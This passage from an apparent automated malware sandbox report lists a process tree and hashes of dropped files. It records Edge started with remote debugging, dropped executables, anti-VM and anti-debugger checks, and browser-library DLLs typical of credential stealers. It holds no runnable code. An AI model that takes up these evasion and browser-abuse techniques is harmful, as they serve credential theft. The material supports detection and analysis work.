                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                  3⤵
                                                                  • Uses browser remote debugging
                                                                  • Enumerates system info in registry
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:3760
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffae28e46f8,0x7ffae28e4708,0x7ffae28e4718
                                                                    4⤵
                                                                    • Checks processor information in registry
                                                                    • Enumerates system info in registry
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:1696
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
                                                                    4⤵
                                                                      PID:1060
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
                                                                      4⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:1376
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2292 /prefetch:2
                                                                      4⤵
                                                                        PID:1700
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
                                                                        4⤵
                                                                          PID:3620
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2816 /prefetch:2
                                                                          4⤵
                                                                            PID:1728
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2676 /prefetch:2
                                                                            4⤵
                                                                              PID:4708
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                                                                              4⤵
                                                                              • Uses browser remote debugging
                                                                              PID:4564
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
                                                                              4⤵
                                                                              • Uses browser remote debugging
                                                                              PID:4952
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2792 /prefetch:2
                                                                              4⤵
                                                                                PID:1924
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2668 /prefetch:2
                                                                                4⤵
                                                                                  PID:2172
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3796 /prefetch:2
                                                                                  4⤵
                                                                                    PID:4352
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3600 /prefetch:2
                                                                                    4⤵
                                                                                      PID:2680
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,6631741015541942704,1885411892256389691,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3548 /prefetch:2
                                                                                      4⤵
                                                                                        PID:2268
                                                                                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                  1⤵
                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                  • Checks BIOS information in registry
                                                                                  • Executes dropped EXE
                                                                                  • Identifies Wine through registry keys
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:1404
                                                                                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                  1⤵
                                                                                    PID:3512
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                    1⤵
                                                                                      PID:2252
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3068 -ip 3068
                                                                                      1⤵
                                                                                        PID:4600
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2264 -ip 2264
                                                                                        1⤵
                                                                                          PID:3144
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1560 -ip 1560
                                                                                          1⤵
                                                                                            PID:1616
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4212 -ip 4212
                                                                                            1⤵
                                                                                              PID:3108
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1560 -ip 1560
                                                                                              1⤵
                                                                                                PID:1376
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1304 -ip 1304
                                                                                                1⤵
                                                                                                  PID:1560
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6532 -ip 6532
                                                                                                  1⤵
                                                                                                    PID:6664
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5736 -ip 5736
                                                                                                    1⤵
                                                                                                      PID:5816
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                      1⤵
                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Executes dropped EXE
                                                                                                      • Identifies Wine through registry keys
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:5964
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:6468
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5452 -ip 5452
                                                                                                      1⤵
                                                                                                        PID:5600
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5452 -ip 5452
                                                                                                        1⤵
                                                                                                          PID:6836
                                                                                                        • C:\ProgramData\ruxcfe\gsfeqdc.exe
                                                                                                          C:\ProgramData\ruxcfe\gsfeqdc.exe start2
                                                                                                          1⤵
                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Executes dropped EXE
                                                                                                          • Identifies Wine through registry keys
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          PID:5996
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5736 -ip 5736
                                                                                                          1⤵
                                                                                                            PID:6464
                                                                                                          • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                            1⤵
                                                                                                              PID:6424
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              1⤵
                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Executes dropped EXE
                                                                                                              • Identifies Wine through registry keys
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              PID:6600
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:6556
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5096 -ip 5096
                                                                                                              1⤵
                                                                                                                PID:5588

                                                                                                              Network

                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • C:\ProgramData\mozglue.dll

                                                                                                                Filesize

                                                                                                                593KB

                                                                                                                MD5

                                                                                                                c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                SHA1

                                                                                                                95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                SHA256

                                                                                                                ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                SHA512

                                                                                                                fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                              • C:\ProgramData\nss3.dll

                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                                MD5

                                                                                                                1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                SHA1

                                                                                                                6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                SHA256

                                                                                                                ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                SHA512

                                                                                                                dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                              • C:\Users\Admin:.repos

                                                                                                                Filesize

                                                                                                                1.2MB

                                                                                                                MD5

                                                                                                                5ec72f13e4ee7a1f273d0562d5eef9a4

                                                                                                                SHA1

                                                                                                                ce28b5e34db985f05e8e5baac59e9580b733ee48

                                                                                                                SHA256

                                                                                                                dcc2661595065e5a3ae1da6796c2948740b3a90cd2f501be0269ded857028dfe

                                                                                                                SHA512

                                                                                                                c5f8f4d38e18b9684bc8c35a98980db7c70bc4b9c2096429bbf5a1e6d41fe32ae5be80ea6eccc62572ec45ff0c50b1fc7b0c0fcbfc6689bf7e837deb02f4c940

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                                Filesize

                                                                                                                40B

                                                                                                                MD5

                                                                                                                09b9941268dbc63b2b6cc713894f3651

                                                                                                                SHA1

                                                                                                                d3fa7baf5d1ceffd6012e2d5a01860e978146003

                                                                                                                SHA256

                                                                                                                a7cfc8b6b668a30b1538077d2beff293931b122b3c2c7dd53acede6fe3f90ba8

                                                                                                                SHA512

                                                                                                                f59389379e4919cebab0723807e9eb7e21396d669d9f31feb781dded193cbfb46f261f6ce42c89789df96506d49a2dca50f0ef7cd883c00c8eddf0e218b51ba1

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\1b5dcd77-d6ff-475c-81cf-302bfdd3df26.tmp

                                                                                                                Filesize

                                                                                                                1B

                                                                                                                MD5

                                                                                                                5058f1af8388633f609cadb75a75dc9d

                                                                                                                SHA1

                                                                                                                3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                                SHA256

                                                                                                                cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                                SHA512

                                                                                                                0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                Filesize

                                                                                                                2B

                                                                                                                MD5

                                                                                                                d751713988987e9331980363e24189ce

                                                                                                                SHA1

                                                                                                                97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                SHA256

                                                                                                                4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                SHA512

                                                                                                                b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT

                                                                                                                Filesize

                                                                                                                16B

                                                                                                                MD5

                                                                                                                46295cac801e5d4857d09837238a6394

                                                                                                                SHA1

                                                                                                                44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                SHA256

                                                                                                                0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                SHA512

                                                                                                                8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                Filesize

                                                                                                                41B

                                                                                                                MD5

                                                                                                                5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                SHA1

                                                                                                                d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                SHA256

                                                                                                                f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                SHA512

                                                                                                                de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\yOO5EOR.exe.log

                                                                                                                Filesize

                                                                                                                425B

                                                                                                                MD5

                                                                                                                fff5cbccb6b31b40f834b8f4778a779a

                                                                                                                SHA1

                                                                                                                899ed0377e89f1ed434cfeecc5bc0163ebdf0454

                                                                                                                SHA256

                                                                                                                b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76

                                                                                                                SHA512

                                                                                                                1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\28acd620-d164-4aed-810f-be10cfff3ebc.dmp

                                                                                                                Filesize

                                                                                                                10.4MB

                                                                                                                MD5

                                                                                                                d1a69eec5b260ec247c95a91562c9b2b

                                                                                                                SHA1

                                                                                                                7d3e54aafd21d2578aa3db50bc3b10fcd7c2f58b

                                                                                                                SHA256

                                                                                                                7f45b9754008e46cd7897b27ced3ffd233b623489f4fec0a7d991bd536e796ac

                                                                                                                SHA512

                                                                                                                6cadeeec8aacb04d4caf07bb9c74e83d8ea6b4259fea92e08054aff32b2dbd482e77cfb4c78f24ff031e894d512f93e466ef70dcc7f35ee64547e747d2b0657a

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                f2b08db3d95297f259f5aabbc4c36579

                                                                                                                SHA1

                                                                                                                f5160d14e7046d541aee0c51c310b671e199f634

                                                                                                                SHA256

                                                                                                                a43c97e4f52c27219be115d0d63f8ff38f98fc60f8aab81136e068ba82929869

                                                                                                                SHA512

                                                                                                                3256d03196afe4fbe81ae359526e686684f5ef8ef03ce500c64a3a8a79c72b779deff71cf64c0ece7d21737ffc67062ec8114c3de5cafd7e8313bb0d08684c75

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                6cdd2d2aae57f38e1f6033a490d08b79

                                                                                                                SHA1

                                                                                                                a54cb1af38c825e74602b18fb1280371c8865871

                                                                                                                SHA256

                                                                                                                56e7dc53fb8968feac9775fc4e2f5474bab2d10d5f1a5db8037435694062fbff

                                                                                                                SHA512

                                                                                                                6cf1ccd4bc6ef53d91c64f152e90f2756f34999a9b9036dc3c4423ec33e0dcee840e754d5efac6715411751facbe78acc6229a2c849877589755f7f578ef949a

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                6KB

                                                                                                                MD5

                                                                                                                70738b74cb6d233ca58625a5a7dbccb9

                                                                                                                SHA1

                                                                                                                2ff515b43bb01e35bc75bee37fcc745404d098a0

                                                                                                                SHA256

                                                                                                                36922bdb1ef176bc1930162c16b4c9d9e9c4686811398e2469ad803672a67b4a

                                                                                                                SHA512

                                                                                                                3d8094cc389a518723be25ee0cda2fd9e91d714006c7fdc6afcce3e3ef33bb60b83dbc6633885d58ea877299e57ed1a5992bf7966c5d4cccaa480a9082e2f3e1

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

                                                                                                                Filesize

                                                                                                                264KB

                                                                                                                MD5

                                                                                                                f50f89a0a91564d0b8a211f8921aa7de

                                                                                                                SHA1

                                                                                                                112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                                SHA256

                                                                                                                b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                                SHA512

                                                                                                                bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\3UCXAPQR\service[1].htm

                                                                                                                Filesize

                                                                                                                1B

                                                                                                                MD5

                                                                                                                cfcd208495d565ef66e7dff9f98764da

                                                                                                                SHA1

                                                                                                                b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                                                                SHA256

                                                                                                                5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                                                                SHA512

                                                                                                                31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2psyjw2x.default-release\activity-stream.discovery_stream.json

                                                                                                                Filesize

                                                                                                                25KB

                                                                                                                MD5

                                                                                                                a2f171b3774cb1c47abd0828f641e5ab

                                                                                                                SHA1

                                                                                                                dc3856378d6021345bef92d3948ace542e31665e

                                                                                                                SHA256

                                                                                                                ed4bac524d48c9db69922ce17ee04d34388722ae6a1d0345540526cbc755068f

                                                                                                                SHA512

                                                                                                                61aea5f6e35273d4e5eb3dcd48bda93d5f619018b04be83eeb15a0d7ac911f373adcb33532511ebfc9beaf281fd936a3fe0708e65544b9292f39aaffa703305e

                                                                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2psyjw2x.default-release\activity-stream.discovery_stream.json.tmp

                                                                                                                Filesize

                                                                                                                21KB

                                                                                                                MD5

                                                                                                                1a563adfb68d6f364ee36d766f720cdb

                                                                                                                SHA1

                                                                                                                77fb006895546c9e1a3afe3c9834a3bfad33c3b4

                                                                                                                SHA256

                                                                                                                708364a89a1c64ba187ced8b6659b040fea74ab6f837a76a48b1455158310287

                                                                                                                SHA512

                                                                                                                90b049fd6e47e2fbdbf9165add9e68512a28bca4b1f3a7869334246d7ff95c434e8c21d11a0248392c5cb059e86ae51dcfd01c4a511613854a26f03860bc85c7

                                                                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2psyjw2x.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

                                                                                                                Filesize

                                                                                                                13KB

                                                                                                                MD5

                                                                                                                928173ac6a717f37a365b111e7fe1584

                                                                                                                SHA1

                                                                                                                4a24b59597b3222c0af0410a994b739614de64c9

                                                                                                                SHA256

                                                                                                                7374bf89bcb645f715a23c4fb1df935bb87ddb14282118990d72f32d215f5eba

                                                                                                                SHA512

                                                                                                                7e63219f05f62be2e0b7ea0cf9b4fafca7f29eaa067b16ed1b62159ef4c5f7e085384b4296527f11e621bbae5421fab357371927c79ea4e713a4494ab0c0f172

                                                                                                              • C:\Users\Admin\AppData\Local\TempOEYTGGVA68PVEB6UHPYGJKRXTMOU7LMB.EXE

                                                                                                                Filesize

                                                                                                                1.7MB

                                                                                                                MD5

                                                                                                                215a11a5495d33448e884f0b4996c800

                                                                                                                SHA1

                                                                                                                5aa7e3c3bc04249b12341c861f3d2bbbc82e1f8c

                                                                                                                SHA256

                                                                                                                4534e29378c262678392bb01ae8d7f003177a7005d0ba98eda957f2eb2baca86

                                                                                                                SHA512

                                                                                                                50ff4e8ead3a783faec849beb33440a9f15e6e5d9f1a04de9ea8362844334329a9c56e355aff2a0246d486e0b31b75547d3bd322b2ff7b2c3c2e990a8c6b89a3

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe

                                                                                                                Filesize

                                                                                                                680KB

                                                                                                                MD5

                                                                                                                a8a583a880111a63bc81037ee0248e19

                                                                                                                SHA1

                                                                                                                ac96ece5099a27edc982082165d65349f89d6327

                                                                                                                SHA256

